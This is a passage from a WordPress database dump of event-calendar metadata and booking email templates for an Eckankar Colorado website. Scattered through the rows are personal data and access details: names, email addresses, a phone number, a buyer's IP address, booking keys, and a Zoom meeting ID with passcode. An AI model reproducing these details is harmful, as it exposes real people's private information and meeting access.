;s:5:\"width\";i:1536;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wpcl_postmeta` VALUES (166732,266887,'mec_all_dates','a:0:{}'),(166733,266887,'mec_other_dates','a:0:{}'),(166633,266883,'mec_end_time_ampm','AM'),(166634,266883,'mec_end_day_seconds','41400'),(166635,266883,'mec_repeat_status','0'),(166636,266883,'mec_repeat_type',''),(166637,266883,'mec_repeat_interval','1'),(166638,266883,'mec_repeat_end',''),(166639,266883,'mec_repeat_end_at_occurrences',''),(166640,266883,'mec_repeat_end_at_date',''),(166621,266883,'mec_comment',''),(166622,266883,'mec_timezone','global'),(166623,266883,'mec_countdown_method','global'),(166624,266883,'mec_public','1'),(166625,266883,'mec_start_date','2022-08-28'),(166626,266883,'mec_start_time_hour','10'),(166627,266883,'mec_start_time_minutes','30'),(166628,266883,'mec_start_time_ampm','AM'),(166629,266883,'mec_start_day_seconds','37800'),(166630,266883,'mec_end_date','2022-08-28'),(166631,266883,'mec_end_time_hour','11'),(166632,266883,'mec_end_time_minutes','30'),(166615,266883,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(166616,266883,'mec_certain_weekdays','a:0:{}'),(166617,266883,'mec_allday','0'),(166618,266883,'one_occurrence','0'),(166619,266883,'mec_hide_time','0'),(166620,266883,'mec_hide_end_time','0'),(167901,267041,'mec_location_id','118'),(166602,266883,'mec_color',''),(166603,266883,'mec_location_id','122'),(166604,266883,'mec_dont_show_map','0'),(166605,266883,'mec_organizer_id','1'),(166606,266883,'mec_read_more',''),(166607,266883,'mec_more_info',''),(166608,266883,'mec_more_info_title',''),(166609,266883,'mec_more_info_target','_self'),(166610,266883,'mec_cost',''),(166611,266883,'mec_currency','a:0:{}'),(166612,266883,'mec_additional_organizer_ids','a:0:{}'),(166613,266883,'mec_additional_location_ids','a:0:{}'),(166614,266883,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-08-28\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-08-28\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(160584,266605,'_wp_attached_file','2022/04/those-wonderful-eck-masters-lscape-1.jpg'),(160585,266605,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:711;s:6:\"height\";i:399;s:4:\"file\";s:48:\"2022/04/those-wonderful-eck-masters-lscape-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:48:\"those-wonderful-eck-masters-lscape-1-300x399.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(160581,266604,'_dp_original','266543'),(160582,266604,'_edit_lock','1673124912:2'),(160583,266604,'_edit_last','2'),(160630,266607,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"teamskidmore@gmail.com\";s:4:\"name\";s:8:\"Shauncie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"174.215.2.52\";}}'),(160629,266607,'mec_ticket_price_1','0'),(160628,266607,'mec_booking_location','118'),(160627,266607,'mec_book_date_submit','20220430195626'),(160626,266607,'mec_attention_time_end','1651447800'),(160625,266607,'mec_attention_time_start','1651401000'),(160624,266607,'mec_attention_time','1651401000:1651447800'),(160623,266607,'mec_other_dates','a:0:{}'),(160617,266607,'mec_confirmed','1'),(160618,266607,'mec_event_id','266573'),(160619,266607,'mec_date','1651401000:1651447800'),(160620,266607,'mec_ticket_id',',1,'),(160621,266607,'mec_booking_time','2022-04-30 19:56:26'),(160622,266607,'mec_all_dates','a:0:{}'),(160614,266607,'mec_verified','1'),(160615,266607,'mec_verification_key','04b1c3951a567d81706d0ea72f15894f'),(160616,266607,'mec_cancellation_key','e281364b055ccbb00294ce56d9758832'),(160613,266607,'mec_user_id','1000000'),(160612,266607,'mec_transaction_id','DGZ85409'),(160611,266605,'smush-complete','1'),(160610,266605,'smush-info','The file was compressed from 53.71 KB to 51.70 KB saving 3.75 percent using WP-Optimize'),(163500,266764,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:17:\"Satsang Intensive\";s:7:\"content\";s:6194:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b><span>893 0175 4811</span><br />\r\n<b>Passcode:</b> <span>804641</span></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us06web.zoom.us/j/89301754811?pwd=WmNRREJxSE5UY3lNSWFuY1R4eXFRQT09\">https://us06web.zoom.us/j/89301754811?pwd=WmNRREJxSE5UY3lNSWFuY1R4eXFRQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b><span>720-707-2699</span> (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:4812:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(163499,266764,'boldgrid_hide_page_title','0'),(163496,266764,'mec_moved_online_link',''),(163497,266764,'mec_cancelled_reason',''),(163498,266764,'mec_display_cancellation_reason_in_single_page',''),(163495,266764,'mec_event_status','EventScheduled'),(163494,266764,'mec_fields','a:0:{}'),(163493,266764,'mec_op','a:0:{}'),(163492,266764,'mec_bfixed_fields','a:0:{}'),(163491,266764,'mec_reg_fields','a:0:{}'),(163490,266764,'mec_reg_fields_global_inheritance','1'),(163489,266764,'mec_ticket_variations','a:0:{}'),(163488,266764,'mec_ticket_variations_global_inheritance','1'),(163487,266764,'mec_fees','a:0:{}'),(163486,266764,'mec_fees_global_inheritance','1'),(163485,266764,'mec_tickets','a:0:{}'),(160586,266604,'_thumbnail_id','266605'),(160579,266604,'boldgrid_in_page_containers','1'),(160578,266604,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(160577,266604,'boldgrid_hide_page_title','0'),(160576,266604,'passster_protection_type','password'),(160575,266604,'passster_activate_protection',NULL),(160574,266604,'passster_activate_global_protection',NULL),(160573,266604,'protect_children',''),(160572,266604,'mec_display_cancellation_reason_in_single_page',''),(160571,266604,'mec_cancelled_reason',''),(160570,266604,'mec_moved_online_link',''),(160569,266604,'mec_event_status','EventScheduled'),(161228,266654,'mec_verified','1'),(161720,266683,'mec_user_id','1000016'),(161721,266683,'mec_verified','1'),(161722,266683,'mec_verification_key','7af63d8404e4832f0adc48d8820fefc4'),(161227,266654,'mec_user_id','1000005'),(161719,266683,'mec_transaction_id','JPU32767'),(161226,266654,'mec_transaction_id','JFL25285'),(160386,266590,'_seq_num','7'),(160385,266590,'_form_id','56'),(160384,266590,'_field_535',''),(160383,266590,'_field_532','amhynes7@msn.com'),(160382,266590,'_field_531','Hynes'),(160381,266590,'_field_530','Agnes '),(157998,266467,'_edit_lock','1688050677:2'),(157999,266467,'_edit_last','2'),(158000,266467,'_thumbnail_id','266470'),(158001,266467,'mec_color',''),(158002,266467,'mec_location_id','122'),(158003,266467,'mec_dont_show_map','0'),(158004,266467,'mec_organizer_id','1'),(158005,266467,'mec_read_more',''),(158006,266467,'mec_more_info',''),(158007,266467,'mec_more_info_title',''),(158008,266467,'mec_more_info_target','_self'),(158009,266467,'mec_cost',''),(158010,266467,'mec_currency','a:0:{}'),(158011,266467,'mec_additional_organizer_ids','a:0:{}'),(158012,266467,'mec_additional_location_ids','a:0:{}'),(158013,266467,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-14\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(158014,266467,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(158015,266467,'mec_certain_weekdays','a:0:{}'),(158016,266467,'mec_allday','0'),(158017,266467,'one_occurrence','0'),(158018,266467,'mec_hide_time','0'),(158019,266467,'mec_hide_end_time','0'),(158020,266467,'mec_comment',''),(158021,266467,'mec_timezone','global'),(158022,266467,'mec_countdown_method','global'),(158023,266467,'mec_public','1'),(158024,266467,'mec_start_date','2022-05-14'),(158025,266467,'mec_start_time_hour','10'),(158026,266467,'mec_start_time_minutes','0'),(158027,266467,'mec_start_time_ampm','AM'),(158028,266467,'mec_start_day_seconds','36000'),(158029,266467,'mec_end_date','2022-05-14'),(158030,266467,'mec_end_time_hour','2'),(158031,266467,'mec_end_time_minutes','0'),(158032,266467,'mec_end_time_ampm','PM'),(158033,266467,'mec_end_day_seconds','50400'),(158034,266467,'mec_repeat_status','0'),(158035,266467,'mec_repeat_type',''),(158036,266467,'mec_repeat_interval','1'),(158037,266467,'mec_repeat_end',''),(158038,266467,'mec_repeat_end_at_occurrences',''),(158039,266467,'mec_repeat_end_at_date',''),(158040,266467,'mec_advanced_days','a:0:{}'),(158041,266467,'mec_in_days',''),(158042,266467,'mec_not_in_days',''),(158043,266467,'mec_hourly_schedules','a:0:{}'),(158044,266467,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(158066,266468,'_field_312','Jonathan'),(158067,266468,'_field_313','Jung'),(158068,266468,'_field_333','5419212542'),(158069,266468,'_field_314','jonathanrjung@icloud.com'),(158070,266468,'_field_315','Meetups'),(158071,266468,'_field_316','When and where are your meetups?  Would love to come.'),(158072,266468,'_form_id','35'),(158073,266468,'_seq_num','47'),(158074,266470,'_wp_attached_file','2022/03/co-ecktemple-1.jpg'),(158075,266470,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:858;s:6:\"height\";i:405;s:4:\"file\";s:26:\"2022/03/co-ecktemple-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-768x363.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:363;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"co-ecktemple-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(158045,266467,'mec_tickets','a:0:{}'),(158046,266467,'mec_fees_global_inheritance','1'),(158047,266467,'mec_fees','a:0:{}'),(158048,266467,'mec_ticket_variations_global_inheritance','1'),(158049,266467,'mec_ticket_variations','a:0:{}'),(158050,266467,'mec_reg_fields_global_inheritance','1'),(158051,266467,'mec_reg_fields','a:0:{}'),(158052,266467,'mec_bfixed_fields','a:0:{}'),(158053,266467,'mec_op','a:0:{}'),(158054,266467,'mec_fields','a:0:{}'),(158055,266467,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(158056,266467,'mec_event_status','EventScheduled'),(158057,266467,'mec_moved_online_link',''),(158058,266467,'mec_cancelled_reason',''),(158059,266467,'mec_display_cancellation_reason_in_single_page',''),(158060,266467,'protect_children',''),(158061,266467,'passster_activate_global_protection',NULL),(158062,266467,'passster_activate_protection',NULL),(158063,266467,'passster_protection_type','password'),(158064,266467,'boldgrid_hide_page_title','0'),(158065,266467,'boldgrid_in_page_containers','1'),(158144,266472,'_wp_attached_file','2022/03/misty-path-1.jpg'),(158145,266472,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:731;s:6:\"height\";i:404;s:4:\"file\";s:24:\"2022/03/misty-path-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"misty-path-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-